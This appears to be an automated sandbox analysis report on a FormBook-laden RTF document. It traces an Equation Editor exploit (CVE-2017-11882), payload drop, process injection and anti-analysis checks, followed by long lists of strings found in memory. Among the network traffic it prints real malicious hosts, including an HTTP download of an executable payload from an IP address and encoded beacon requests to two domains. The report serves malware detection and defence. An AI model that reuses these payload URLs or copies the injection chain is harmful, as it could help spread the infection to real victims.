Analysis Report fqwBU8MyzT.rtf

Overview

General Information

Sample Name: fqwBU8MyzT.rtf
Analysis ID: 321301
MD5: b115f24fcecce5e8661300527a748448
SHA1: 9673703628a2edf4fea0b3a764357f82b4c9ce9f
SHA256: 15655af972b632964f3327334c8809fb6cd6cd04e43f4548a32a5bb5743a75bc
Tags: Formbook, rtf

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1276 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1428 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2492 cmdline: 'C:\Users\Public\vbc.exe' MD5: BB30A5DD4130B071FB4CA5F005371C63)
      • RegSvcs.exe (PID: 2560 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
      • RegSvcs.exe (PID: 2520 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wlanext.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
            • cmd.exe (PID: 2812 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 2700 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      6.2.RegSvcs.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      6.2.RegSvcs.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      6.2.RegSvcs.exe.400000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      6.2.RegSvcs.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      6.2.RegSvcs.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          System Summary:

          Sigma detected: Droppers Exploiting CVE-2017-11882
          Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network Connection, Author: Joe Security, Data: DestinationIp: 103.207.38.170, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1428, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1428, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe
          Sigma detected: Executables Started in Suspicious Folder
          Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492
          Sigma detected: Execution in Non-Executable Folder
          Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492
          Sigma detected: Suspicious Program Location Process Starts
          Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1428, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2492

          Signature Overview

          AV Detection:

          Antivirus / Scanner detection for submitted sample
          Source: fqwBU8MyzT.rtf, Avira: detected
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe, ReversingLabs: Detection: 35%
          Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 35%
          Multi AV Scanner detection for submitted file
          Source: fqwBU8MyzT.rtf, ReversingLabs: Detection: 48%
          Yara detected FormBook
          Source: Yara match, File source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe, Joe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
          Source: 6.2.RegSvcs.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
          Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: global traffic, DNS query: name: www.auctionpros.club
          Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 103.207.38.170:80
          Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 20 Nov 2020 19:04:32 GMT; Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7; Last-Modified: Thu, 19 Nov 2020 08:07:19 GMT; ETag: "ada00-5b471378e0ce7"; Accept-Ranges: bytes; Content-Length: 711168; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload
          Source: global traffic, HTTP traffic detected: GET /glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri HTTP/1.1; Host: www.auctionpros.club; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri HTTP/1.1; Host: www.sgbanfang.com; Connection: close; Data Raw: 00 00 00 00 00 00 00
          Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox View, ASN Name: HENGTONG-IDC-LLCUS HENGTONG-IDC-LLCUS
          Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
          Source: global traffic, HTTP traffic detected: GET /pp.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: 103.207.38.170; Connection: Keep-Alive
          Source: unknown, TCP traffic detected without corresponding DNS query: 103.207.38.170
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD501063-4E04-4856-9DA8-291722E1F767}.tmp
          Source: unknown, DNS traffic detected: queries for: www.auctionpros.club
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Fri, 20 Nov 2020 19:06:00 GMT; Server: Apache; Accept-Ranges: bytes; Transfer-Encoding: chunked; Content-Type: text/html; Connection: close
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: wlanext.exe, 00000009.00000002.2401705675.000000000294F000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000007.00000000.2107641557.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
